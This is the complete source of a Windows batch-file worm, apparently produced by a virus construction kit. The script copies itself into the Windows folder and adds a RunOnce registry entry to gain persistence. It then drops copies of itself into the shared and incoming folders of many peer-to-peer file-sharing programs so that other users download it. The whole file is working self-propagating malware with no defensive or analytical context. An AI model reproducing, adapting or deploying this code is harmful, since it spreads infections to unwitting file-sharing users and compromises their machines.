::
:: Generated by Batch Virus Construction Kit 0.2 [DvL]-[rRLF]
:: Created by Ratty
::
@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\cngllnjv.bat>nul
echo.REGEDIT4>%windir%\cngllnjv.reg
echo.[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]>>%windir%\cngllnjv.reg
echo."cngllnjv"="%windir%\cngllnjv.bat">>%windir%\cngllnjv.reg
regedit /s %windir%\cngllnjv.reg
copy %0 c:\kazaa\myshar~1\cngllnjv.bat>nul
copy %0 c:\mydown~1\cngllnjv.bat>nul
copy %0 c:\mydocu~1\cngllnjv.bat>nul
copy %0 c:\eigene~1\cngllnjv.bat>nul
copy %0 c:\progra~1\applej~1\incoming\cngllnjv.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\cngllnjv.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\cngllnjv.bat>nul
copy %0 c:\progra~1\emule\incoming\cngllnjv.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\cngllnjv.bat>nul
copy %0 c:\progra~1\icq\shared~1\cngllnjv.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\cngllnjv.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\cngllnjv.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\cngllnjv.bat>nul
copy %0 c:\progra~1\limewire\shared\cngllnjv.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\cngllnjv.bat>nul
copy %0 c:\progra~1\overnet\bundles\cngllnjv.bat>nul
